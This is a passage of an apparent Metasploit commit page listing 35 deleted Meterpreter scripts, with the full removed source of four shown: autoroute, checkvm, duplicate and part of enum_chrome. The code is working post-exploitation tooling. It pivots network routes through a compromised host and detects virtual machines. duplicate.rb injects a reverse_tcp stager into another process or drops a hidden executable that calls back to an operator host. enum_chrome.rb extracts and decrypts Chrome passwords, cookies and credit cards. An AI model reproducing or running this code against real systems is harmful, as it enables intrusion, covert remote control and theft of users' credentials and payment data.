Browse Source

delete meterpreter scripts with replacement post modules

Brent Cook 2 years ago
parent
commit
13b06db48e
35 changed files with 0 additions and 6560 deletions
  1. 0
    209
      scripts/meterpreter/autoroute.rb
  2. 0
    359
      scripts/meterpreter/checkvm.rb
  3. 0
    153
      scripts/meterpreter/duplicate.rb
  4. 0
    244
      scripts/meterpreter/enum_chrome.rb
  5. 0
    292
      scripts/meterpreter/enum_firefox.rb
  6. 0
    101
      scripts/meterpreter/enum_logged_on_users.rb
  7. 0
    132
      scripts/meterpreter/enum_powershell_env.rb
  8. 0
    104
      scripts/meterpreter/enum_putty.rb
  9. 0
    124
      scripts/meterpreter/enum_shares.rb
  10. 0
    87
      scripts/meterpreter/file_collector.rb
  11. 0
    70
      scripts/meterpreter/get_application_list.rb
  12. 0
    177
      scripts/meterpreter/get_filezilla_creds.rb
  13. 0
    35
      scripts/meterpreter/get_local_subnets.rb
  14. 0
    64
      scripts/meterpreter/get_valid_community.rb
  15. 0
    381
      scripts/meterpreter/getcountermeasure.rb
  16. 0
    190
      scripts/meterpreter/getgui.rb
  17. 0
    109
      scripts/meterpreter/getvncpw.rb
  18. 0
    306
      scripts/meterpreter/hashdump.rb
  19. 0
    108
      scripts/meterpreter/hostsedit.rb
  20. 0
    212
      scripts/meterpreter/keylogrecorder.rb
  21. 0
    619
      scripts/meterpreter/killav.rb
  22. 0
    139
      scripts/meterpreter/metsvc.rb
  23. 0
    96
      scripts/meterpreter/migrate.rb
  24. 0
    219
      scripts/meterpreter/packetrecorder.rb
  25. 0
    259
      scripts/meterpreter/persistence.rb
  26. 0
    195
      scripts/meterpreter/prefetchtool.rb
  27. 0
    196
      scripts/meterpreter/remotewinenum.rb
  28. 0
    394
      scripts/meterpreter/schelevator.rb
  29. 0
    84
      scripts/meterpreter/screen_unlock.rb
  30. 0
    158
      scripts/meterpreter/screenspy.rb
  31. 0
    107
      scripts/meterpreter/search_dwld.rb
  32. 0
    210
      scripts/meterpreter/service_permissions_escalate.rb
  33. 0
    149
      scripts/meterpreter/uploadexec.rb
  34. 0
    141
      scripts/meterpreter/webcam.rb
  35. 0
    137
      scripts/meterpreter/wmic.rb

+ 0
- 209
scripts/meterpreter/autoroute.rb View File

@@ -1,209 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to improve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Meterpreter script for setting up a route from within a
10
-# Meterpreter session, without having to background the
11
-# current session.
12
-
13
-# Default options
14
-session = client
15
-subnet = nil
16
-netmask = "255.255.255.0"
17
-print_only = false
18
-remove_route = false
19
-remove_all_routes = false
20
-
21
-# Options parsing
22
-@@exec_opts = Rex::Parser::Arguments.new(
23
-  "-h" => [false, "Help and usage"],
24
-  "-s" => [true, "Subnet (IPv4, for example, 10.10.10.0)"],
25
-  "-n" => [true, "Netmask (IPv4, for example, 255.255.255.0"],
26
-  "-p" => [false, "Print active routing table. All other options are ignored"],
27
-  "-d" => [false, "Delete the named route instead of adding it"],
28
-  "-D" => [false, "Delete all routes (does not require a subnet)"]
29
-)
30
-
31
-@@exec_opts.parse(args) { |opt, idx, val|
32
-  v = val.to_s.strip
33
-  case opt
34
-  when "-h"
35
-    usage
36
-    raise Rex::Script::Completed
37
-  when "-s"
38
-    if v =~ /[0-9\x2e]+\x2f[0-9]{1,2}/
39
-      subnet,cidr = v.split("\x2f")
40
-      netmask = Rex::Socket.addr_ctoa(cidr.to_i)
41
-    else
42
-      subnet = v
43
-    end
44
-  when "-n"
45
-    if (0..32) === v.to_i
46
-      netmask = Rex::Socket.addr_ctoa(v.to_i)
47
-    else
48
-      netmask = v
49
-    end
50
-  when "-p"
51
-    print_only = true
52
-  when "-d"
53
-    remove_route = true
54
-  when "-D"
55
-    remove_all_routes = true
56
-  end
57
-}
58
-
59
-def delete_all_routes
60
-  if Rex::Socket::SwitchBoard.routes.size > 0
61
-    routes = []
62
-    Rex::Socket::SwitchBoard.each do |route|
63
-      routes << {:subnet => route.subnet, :netmask => route.netmask}
64
-    end
65
-    routes.each {|route_opts| delete_route(route_opts)}
66
-
67
-    print_status "Deleted all routes"
68
-  else
69
-    print_status "No routes have been added yet"
70
-  end
71
-  raise Rex::Script::Completed
72
-end
73
-
74
-# Identical functionality to command_dispatcher/core.rb, and
75
-# nearly identical code
76
-def print_routes
77
-  if Rex::Socket::SwitchBoard.routes.size > 0
78
-    tbl =	Msf::Ui::Console::Table.new(
79
-      Msf::Ui::Console::Table::Style::Default,
80
-      'Header'  => "Active Routing Table",
81
-      'Prefix'  => "\n",
82
-      'Postfix' => "\n",
83
-      'Columns' =>
84
-        [
85
-          'Subnet',
86
-          'Netmask',
87
-          'Gateway',
88
-        ],
89
-      'ColProps' =>
90
-        {
91
-          'Subnet'  => { 'MaxWidth' => 17 },
92
-          'Netmask' => { 'MaxWidth' => 17 },
93
-        })
94
-    ret = []
95
-
96
-    Rex::Socket::SwitchBoard.each { |route|
97
-      if (route.comm.kind_of?(Msf::Session))
98
-        gw = "Session #{route.comm.sid}"
99
-      else
100
-        gw = route.comm.name.split(/::/)[-1]
101
-      end
102
-      tbl << [ route.subnet, route.netmask, gw ]
103
-    }
104
-      print tbl.to_s
105
-  else
106
-    print_status "No routes have been added yet"
107
-  end
108
-  raise Rex::Script::Completed
109
-end
110
-
111
-# Yet another IP validator. I'm sure there's some Rex
112
-# function that can just do this.
113
-def check_ip(ip=nil)
114
-  return false if(ip.nil? || ip.strip.empty?)
115
-  begin
116
-    rw = Rex::Socket::RangeWalker.new(ip.strip)
117
-    (rw.valid? && rw.length == 1) ? true : false
118
-  rescue
119
-    false
120
-  end
121
-end
122
-
123
-# Adds a route to the framework instance
124
-def add_route(opts={})
125
-  subnet = opts[:subnet]
126
-  netmask = opts[:netmask] || "255.255.255.0" # Default class C
127
-  Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
128
-end
129
-
130
-# Removes a route to the framework instance
131
-def delete_route(opts={})
132
-  subnet = opts[:subnet]
133
-  netmask = opts[:netmask] || "255.255.255.0" # Default class C
134
-  Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session)
135
-end
136
-
137
-
138
-# Defines usage
139
-def usage()
140
-  print_status "Usage:   run autoroute [-r] -s subnet -n netmask"
141
-  print_status "Examples:"
142
-  print_status "  run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0"
143
-  print_status "  run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0"
144
-  print_status "  run autoroute -s 10.10.10.1/24              # CIDR notation is also okay"
145
-  print_status "  run autoroute -p                            # Print active routing table"
146
-  print_status "  run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route"
147
-  print_status "Use the \"route\" and \"ipconfig\" Meterpreter commands to learn about available routes"
148
-  print_error "Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module"
149
-end
150
-
151
-# Validates the command options
152
-def validate_cmd(subnet=nil,netmask=nil)
153
-  if subnet.nil?
154
-    print_error "Missing -s (subnet) option"
155
-    return false
156
-  end
157
-
158
-  unless(check_ip(subnet))
159
-    print_error "Subnet invalid (must be IPv4)"
160
-    usage
161
-    return false
162
-  end
163
-
164
-  if(netmask and !(Rex::Socket.addr_atoc(netmask)))
165
-    print_error "Netmask invalid (must define contiguous IP addressing)"
166
-    usage
167
-    return false
168
-  end
169
-
170
-  if(netmask and !check_ip(netmask))
171
-    print_error "Netmask invalid"
172
-    return usage
173
-  end
174
-  true
175
-end
176
-
177
-if print_only
178
-  print_routes()
179
-  raise Rex::Script::Completed
180
-end
181
-
182
-if remove_all_routes
183
-  delete_all_routes()
184
-  raise Rex::Script::Completed
185
-end
186
-
187
-raise Rex::Script::Completed unless validate_cmd(subnet,netmask)
188
-
189
-if remove_route
190
-  print_status("Deleting route to %s/%s..." % [subnet,netmask])
191
-  route_result = delete_route(:subnet => subnet, :netmask => netmask)
192
-else
193
-  print_status("Adding a route to %s/%s..." % [subnet,netmask])
194
-  route_result = add_route(:subnet => subnet, :netmask => netmask)
195
-end
196
-
197
-if route_result
198
-  print_good "%s route to %s/%s via %s" % [
199
-    (remove_route ? "Deleted" : "Added"),
200
-    subnet,netmask,client.sock.peerhost
201
-  ]
202
-else
203
-  print_error "Could not %s route" % [(remove_route ? "delete" : "add")]
204
-end
205
-
206
-if Rex::Socket::SwitchBoard.routes.size > 0
207
-  print_status "Use the -p option to list all active routes"
208
-end
209
-

+ 0
- 359
scripts/meterpreter/checkvm.rb View File

@@ -1,359 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Meterpreter script for detecting if target host is a Virtual Machine
9
-# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
10
-# Version: 0.2.0
11
-session = client
12
-
13
-@@exec_opts = Rex::Parser::Arguments.new(
14
-  "-h" => [ false,"Help menu." ]
15
-)
16
-
17
-@@exec_opts.parse(args) { |opt, idx, val|
18
-  case opt
19
-  when "-h"
20
-    print_line("CheckVM -- Check various attributes on the target for evidence that it is a virtual machine")
21
-    print_line("USAGE: run checkvm")
22
-    print_line(@@exec_opts.usage)
23
-    raise Rex::Script::Completed
24
-  end
25
-}
26
-
27
-# Function for detecting if it is a Hyper-V VM
28
-def hypervchk(session)
29
-  begin
30
-    vm = false
31
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
32
-    sfmsvals = key.enum_key
33
-    if sfmsvals.include?("Hyper-V")
34
-      print_status("This is a Hyper-V Virtual Machine")
35
-      vm = true
36
-    elsif sfmsvals.include?("VirtualMachine")
37
-      print_status("This is a Hyper-V Virtual Machine")
38
-      vm = true
39
-    end
40
-    key.close
41
-  rescue
42
-  end
43
-
44
-  if not vm
45
-    begin
46
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
47
-      srvvals = key.enum_key
48
-      if srvvals.include?("vmicheartbeat")
49
-        print_status("This is a Hyper-V Virtual Machine")
50
-        vm = true
51
-      elsif srvvals.include?("vmicvss")
52
-        print_status("This is a Hyper-V Virtual Machine")
53
-        vm = true
54
-      elsif srvvals.include?("vmicshutdown")
55
-        print_status("This is a Hyper-V Virtual Machine")
56
-        vm = true
57
-      elsif srvvals.include?("vmicexchange")
58
-        print_status("This is a Hyper-V Virtual Machine")
59
-        vm = true
60
-      end
61
-    rescue
62
-    end
63
-  end
64
-  return vm
65
-end
66
-
67
-# Function for checking if it is a VMware VM
68
-def vmwarechk(session)
69
-  vm = false
70
-  begin
71
-  key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
72
-  srvvals = key.enum_key
73
-  if srvvals.include?("vmdebug")
74
-    print_status("This is a VMware Virtual Machine")
75
-    vm = true
76
-  elsif srvvals.include?("vmmouse")
77
-    print_status("This is a VMware Virtual Machine")
78
-    vm = true
79
-  elsif srvvals.include?("VMTools")
80
-    print_status("This is a VMware Virtual Machine")
81
-    vm = true
82
-  elsif srvvals.include?("VMMEMCTL")
83
-    print_status("This is a VMware Virtual Machine")
84
-    vm = true
85
-  end
86
-  key.close
87
-  rescue
88
-  end
89
-  if not vm
90
-    begin
91
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
92
-      if key.query_value('Identifier').data.downcase =~ /vmware/
93
-        print_status("This is a VMware Virtual Machine")
94
-        vm = true
95
-      end
96
-    rescue
97
-    end
98
-  end
99
-  if not vm
100
-    vmwareprocs = [
101
-      "vmwareuser.exe",
102
-      "vmwaretray.exe"
103
-    ]
104
-    vmwareprocs.each do |p|
105
-      session.sys.process.get_processes().each do |x|
106
-        if p == (x['name'].downcase)
107
-          print_status("This is a VMware Virtual Machine") if not vm
108
-          vm = true
109
-        end
110
-      end
111
-    end
112
-  end
113
-  key.close
114
-  return vm
115
-
116
-end
117
-# Function for checking if it is a Virtual PC VM
118
-def checkvrtlpc(session)
119
-  vm = false
120
-  vpcprocs = [
121
-    "vmusrvc.exe",
122
-    "vmsrvc.exe"
123
-  ]
124
-  vpcprocs.each do |p|
125
-    session.sys.process.get_processes().each do |x|
126
-      if p == (x['name'].downcase)
127
-        print_status("This is a VirtualPC Virtual Machine") if not vm
128
-        vm = true
129
-      end
130
-    end
131
-  end
132
-  if not vm
133
-    begin
134
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
135
-    srvvals = key.enum_key
136
-    if srvvals.include?("vpcbus")
137
-      print_status("This is a VirtualPC Virtual Machine")
138
-      vm = true
139
-    elsif srvvals.include?("vpc-s3")
140
-      print_status("This is a VirtualPC Virtual Machine")
141
-      vm = true
142
-    elsif srvvals.include?("vpcuhub")
143
-      print_status("This is a VirtualPC Virtual Machine")
144
-      vm = true
145
-    elsif srvvals.include?("msvmmouf")
146
-      print_status("This is a VirtualPC Virtual Machine")
147
-      vm = true
148
-    end
149
-    key.close
150
-    rescue
151
-    end
152
-  end
153
-  return vm
154
-end
155
-
156
-def vboxchk(session)
157
-  vm = false
158
-  vboxprocs = [
159
-    "vboxservice.exe",
160
-    "vboxtray.exe"
161
-  ]
162
-  vboxprocs.each do |p|
163
-    session.sys.process.get_processes().each do |x|
164
-      if p == (x['name'].downcase)
165
-        print_status("This is a Sun VirtualBox Virtual Machine") if not vm
166
-        vm = true
167
-      end
168
-    end
169
-  end
170
-  if not vm
171
-  begin
172
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
173
-    srvvals = key.enum_key
174
-    if srvvals.include?("VBOX__")
175
-      print_status("This is a Sun VirtualBox Virtual Machine")
176
-      vm = true
177
-    end
178
-  rescue
179
-  end
180
-  end
181
-  if not vm
182
-    begin
183
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
184
-    srvvals = key.enum_key
185
-    if srvvals.include?("VBOX__")
186
-      print_status("This is a Sun VirtualBox Virtual Machine")
187
-      vm = true
188
-    end
189
-    rescue
190
-    end
191
-  end
192
-  if not vm
193
-    begin
194
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
195
-    srvvals = key.enum_key
196
-    if srvvals.include?("VBOX__")
197
-      print_status("This is a Sun VirtualBox Virtual Machine")
198
-      vm = true
199
-    end
200
-    rescue
201
-    end
202
-  end
203
-  if not vm
204
-    begin
205
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
206
-    if key.query_value('Identifier').data.downcase =~ /vbox/
207
-      print_status("This is a Sun VirtualBox Virtual Machine")
208
-      vm = true
209
-    end
210
-    rescue
211
-    end
212
-  end
213
-  if not vm
214
-    begin
215
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System')
216
-    if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/
217
-      print_status("This is a Sun VirtualBox Virtual Machine")
218
-      vm = true
219
-    end
220
-    rescue
221
-    end
222
-  end
223
-  if not vm
224
-    begin
225
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
226
-    srvvals = key.enum_key
227
-    if srvvals.include?("VBoxMouse")
228
-      print_status("This is a Sun VirtualBox Virtual Machine")
229
-      vm = true
230
-    elsif srvvals.include?("VBoxGuest")
231
-      print_status("This is a Sun VirtualBox Virtual Machine")
232
-      vm = true
233
-    elsif srvvals.include?("VBoxService")
234
-      print_status("This is a Sun VirtualBox Virtual Machine")
235
-      vm = true
236
-    elsif srvvals.include?("VBoxSF")
237
-      print_status("This is a Sun VirtualBox Virtual Machine")
238
-      vm = true
239
-    end
240
-    key.close
241
-    rescue
242
-    end
243
-  end
244
-  return vm
245
-end
246
-
247
-def xenchk(session)
248
-  vm = false
249
-  xenprocs = [
250
-    "xenservice.exe"
251
-  ]
252
-  xenprocs.each do |p|
253
-    session.sys.process.get_processes().each do |x|
254
-      if p == (x['name'].downcase)
255
-        print_status("This is a Xen Virtual Machine") if not vm
256
-        vm = true
257
-      end
258
-    end
259
-  end
260
-  if not vm
261
-  begin
262
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
263
-    srvvals = key.enum_key
264
-    if srvvals.include?("Xen")
265
-      print_status("This is a Xen Virtual Machine")
266
-      vm = true
267
-    end
268
-  rescue
269
-  end
270
-  end
271
-  if not vm
272
-    begin
273
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
274
-    srvvals = key.enum_key
275
-    if srvvals.include?("Xen")
276
-      print_status("This is a Xen Virtual Machine")
277
-      vm = true
278
-    end
279
-    rescue
280
-    end
281
-  end
282
-  if not vm
283
-    begin
284
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
285
-    srvvals = key.enum_key
286
-    if srvvals.include?("Xen")
287
-      print_status("This is a Xen Virtual Machine")
288
-      vm = true
289
-    end
290
-    rescue
291
-    end
292
-  end
293
-  if not vm
294
-    begin
295
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
296
-    srvvals = key.enum_key
297
-    if srvvals.include?("xenevtchn")
298
-      print_status("This is a Xen Virtual Machine")
299
-      vm = true
300
-    elsif srvvals.include?("xennet")
301
-      print_status("This is a Xen Virtual Machine")
302
-      vm = true
303
-    elsif srvvals.include?("xennet6")
304
-      print_status("This is a Xen Virtual Machine")
305
-      vm = true
306
-    elsif srvvals.include?("xensvc")
307
-      print_status("This is a Xen Virtual Machine")
308
-      vm = true
309
-    elsif srvvals.include?("xenvdb")
310
-      print_status("This is a Xen Virtual Machine")
311
-      vm = true
312
-    end
313
-    key.close
314
-    rescue
315
-    end
316
-  end
317
-  return vm
318
-end
319
-
320
-def qemuchk(session)
321
-  vm = false
322
-  if not vm
323
-    begin
324
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
325
-      if key.query_value('Identifier').data.downcase =~ /qemu/
326
-        print_status("This is a QEMU/KVM Virtual Machine")
327
-        vm = true
328
-      end
329
-    rescue
330
-    end
331
-  end
332
-  if not vm
333
-    begin
334
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0')
335
-      if key.query_value('ProcessorNameString').data.downcase =~ /qemu/
336
-        print_status("This is a QEMU/KVM Virtual Machine")
337
-        vm = true
338
-      end
339
-    rescue
340
-    end
341
-  end
342
-
343
-  return vm
344
-
345
-end
346
-
347
-if client.platform =~ /win32|win64/
348
-  print_status("Checking if target is a Virtual Machine .....")
349
-  found = hypervchk(session)
350
-  found = vmwarechk(session) if not found
351
-  found = checkvrtlpc(session) if not found
352
-  found = vboxchk(session) if not found
353
-  found = xenchk(session) if not found
354
-  found = qemuchk(session) if not found
355
-  print_status("It appears to be physical host.") if not found
356
-else
357
-  print_error("This version of Meterpreter is not supported with this Script!")
358
-  raise Rex::Script::Completed
359
-end

+ 0
- 153
scripts/meterpreter/duplicate.rb View File

@@ -1,153 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Author: Scriptjunkie
9
-# Uses a meterpreter session to spawn a new meterpreter session in a different process.
10
-# A new process allows the session to take "risky" actions that might get the process killed by
11
-# A/V, giving a meterpreter session to another controller, or start a keylogger on another
12
-# process.
13
-#
14
-
15
-#
16
-# Options
17
-#
18
-opts = Rex::Parser::Arguments.new(
19
-  "-h"  => [ false,  "This help menu"],
20
-  "-r"  => [ true,   "The IP of a remote Metasploit listening for the connect back"],
21
-  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4546)"],
22
-  "-w"  => [ false,  "Write and execute an exe instead of injecting into a process"],
23
-  "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
24
-  "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
25
-  "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
26
-  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
27
-)
28
-
29
-#
30
-# Default parameters
31
-#
32
-
33
-rhost    = Rex::Socket.source_address("1.2.3.4")
34
-rport    = 4546
35
-lhost    = "127.0.0.1"
36
-
37
-spawn = false
38
-autoconn = true
39
-inject   = true
40
-target_pid = nil
41
-target    = "notepad.exe"
42
-pay      = nil
43
-
44
-#
45
-# Option parsing
46
-#
47
-opts.parse(args) do |opt, idx, val|
48
-  case opt
49
-  when "-h"
50
-    print_line(opts.usage)
51
-    raise Rex::Script::Completed
52
-  when "-r"
53
-    rhost = val
54
-  when "-p"
55
-    rport = val.to_i
56
-  when "-P"
57
-    target_pid = val.to_i
58
-  when "-e"
59
-    target = val
60
-  when "-D"
61
-    autoconn = false
62
-  when "-w"
63
-    inject = false
64
-  when "-s"
65
-    spawn = true
66
-  end
67
-end
68
-
69
-print_status("Creating a reverse meterpreter stager: LHOST=#{rhost} LPORT=#{rport}")
70
-
71
-payload = "windows/meterpreter/reverse_tcp"
72
-pay = client.framework.payloads.create(payload)
73
-pay.datastore['LHOST'] = rhost
74
-pay.datastore['LPORT'] = rport
75
-mul = client.framework.exploits.create("multi/handler")
76
-mul.share_datastore(pay.datastore)
77
-mul.datastore['WORKSPACE'] = client.workspace
78
-mul.datastore['PAYLOAD'] = payload
79
-mul.datastore['EXITFUNC'] = 'process'
80
-mul.datastore['ExitOnSession'] = true
81
-print_status("Running payload handler")
82
-mul.exploit_simple(
83
-  'Payload'  => mul.datastore['PAYLOAD'],
84
-  'RunAsJob' => true
85
-)
86
-
87
-if client.platform =~ /win32|win64/
88
-  server = client.sys.process.open
89
-
90
-  print_status("Current server process: #{server.name} (#{server.pid})")
91
-
92
-  if ! inject
93
-    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
94
-    print_status("Meterpreter stager executable #{exe.length} bytes long")
95
-
96
-    #
97
-    # Upload to the filesystem
98
-    #
99
-    tempdir = client.sys.config.getenv('TEMP')
100
-    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
101
-    tempexe.gsub!("\\\\", "\\")
102
-
103
-    fd = client.fs.file.new(tempexe, "wb")
104
-    fd.write(exe)
105
-    fd.close
106
-    print_status("Uploaded the agent to #{tempexe} (must be deleted manually)")
107
-
108
-    #
109
-    # Execute the agent
110
-    #
111
-    print_status("Executing the agent with endpoint #{rhost}:#{rport}...")
112
-    pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
113
-  elsif ! spawn
114
-    # Get the target process name
115
-    print_status("Duplicating into #{target}...")
116
-
117
-    # Get the target process pid
118
-    if not target_pid
119
-      target_pid = client.sys.process[target]
120
-    end
121
-
122
-    if not target_pid
123
-      print_error("Could not access the target process")
124
-      print_status("Spawning a notepad.exe host process...")
125
-      note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
126
-      target_pid = note.pid
127
-    end
128
-  else
129
-    print_status("Spawning a #{target} host process...")
130
-    newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
131
-    target_pid = newproc.pid
132
-    if not target_pid
133
-      print_error("Could not create a process around #{target}")
134
-      raise Rex::Script::Completed
135
-    end
136
-  end
137
-
138
-  # Do the duplication
139
-  print_status("Injecting meterpreter into process ID #{target_pid}")
140
-  host_process = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
141
-  raw = pay.generate
142
-  mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
143
-
144
-  print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
145
-  print_status("Writing the stager into memory...")
146
-  host_process.memory.write(mem, raw)
147
-  host_process.thread.create(mem, 0)
148
-  print_status("New server process: #{target_pid}")
149
-
150
-else
151
-  print_error("This version of Meterpreter is not supported with this Script!")
152
-  raise Rex::Script::Completed
153
-end

+ 0
- 244
scripts/meterpreter/enum_chrome.rb View File

@@ -1,244 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Script to extract data from a chrome installation.
10
-#
11
-# Author: Sven Taute <sven dot taute at gmail com>
12
-#
13
-
14
-require 'sqlite3'
15
-require 'yaml'
16
-
17
-if client.platform !~ /win32/
18
-  print_error("This version of Meterpreter is not supported with this Script!")
19
-  raise Rex::Script::Completed
20
-end
21
-@host_info = client.sys.config.sysinfo
22
-@chrome_files = [
23
-  { :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"},
24
-  { :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"},
25
-  { :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"},
26
-  { :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]},
27
-  { :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"},
28
-  { :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"},
29
-  { :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"},
30
-  { :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"},
31
-  { :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]},
32
-  { :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"},
33
-  { :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"},
34
-]
35
-@migrate = false
36
-@old_pid = nil
37
-@output_format = []
38
-
39
-opts = Rex::Parser::Arguments.new(
40
-  "-h" => [ false, "Help menu" ],
41
-  "-m" => [ false, "Migrate into explorer.exe"],
42
-  "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
43
-)
44
-
45
-opts.parse(args) { |opt, idx, val|
46
-  case opt
47
-  when "-m"
48
-    @migrate = true
49
-  when "-f"
50
-    if val =~ /^j(son)?$/
51
-      @output_format << "json"
52
-    elsif val =~ /^y(aml)?$/
53
-      @output_format << "yaml"
54
-    elsif val =~ /^t(ext)?$/
55
-      @output_format << "text"
56
-    else
57
-      print_error("unknown format '#{val}'.")
58
-      raise Rex::Script::Completed
59
-    end
60
-  when "-h"
61
-    print_line("")
62
-    print_line("DESCRIPTION: Script for enumerating preferences and extracting")
63
-    print_line("information from the Google Chrome Browser on a target system.")
64
-    print_line("Decryption of creditcard information and passwords only supported")
65
-    print_line("on 32bit Windows Operating Systems.")
66
-    print_line("")
67
-    print_line("USAGE: run enum_chrome [-m]")
68
-    print_line(opts.usage)
69
-    raise Rex::Script::Completed
70
-  end
71
-}
72
-
73
-@output_format << "json" if @output_format.empty?
74
-if @output_format.include?("json")
75
-  begin
76
-    require 'json'
77
-  rescue LoadError
78
-    print_error("JSON is not available.")
79
-    @output_format.delete("json")
80
-    if @output_format.empty?
81
-      print_status("Falling back to raw text output.")
82
-      @output_format << "text"
83
-    end
84
-  end
85
-end
86
-print_status("using output format(s): " + @output_format.join(", "))
87
-
88
-def prepare_railgun
89
-  rg = client.railgun
90
-  if (!rg.get_dll('crypt32'))
91
-    rg.add_dll('crypt32')
92
-  end
93
-
94
-  if (!rg.crypt32.functions["CryptUnprotectData"])
95
-    rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
96
-        ["PBLOB","pDataIn", "in"],
97
-        ["PWCHAR", "szDataDescr", "out"],
98
-        ["PBLOB", "pOptionalEntropy", "in"],
99
-        ["PDWORD", "pvReserved", "in"],
100
-        ["PBLOB", "pPromptStruct", "in"],
101
-        ["DWORD", "dwFlags", "in"],
102
-        ["PBLOB", "pDataOut", "out"]
103
-      ])
104
-  end
105
-end
106
-
107
-def decrypt_data(data)
108
-  rg = client.railgun
109
-  pid = client.sys.process.open.pid
110
-  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
111
-
112
-  mem = process.memory.allocate(1024)
113
-  process.memory.write(mem, data)
114
-
115
-  addr = [mem].pack("V")
116
-  len = [data.length].pack("V")
117
-  ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
118
-  len, addr = ret["pDataOut"].unpack("V2")
119
-  return "" if len == 0
120
-  decrypted = process.memory.read(addr, len)
121
-end
122
-
123
-def write_output(file, rows)
124
-  if @output_format.include?("json")
125
-    ::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) }
126
-  end
127
-  if @output_format.include?("yaml")
128
-    ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
129
-  end
130
-  if @output_format.include?("text")
131
-    ::File.open(file + ".txt", "w") do |f|
132
-      f.write(rows.first.keys.join("\t") + "\n")
133
